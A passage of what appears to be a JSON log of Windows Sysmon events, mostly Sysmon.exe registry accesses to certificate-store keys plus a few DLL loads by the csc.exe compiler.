"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 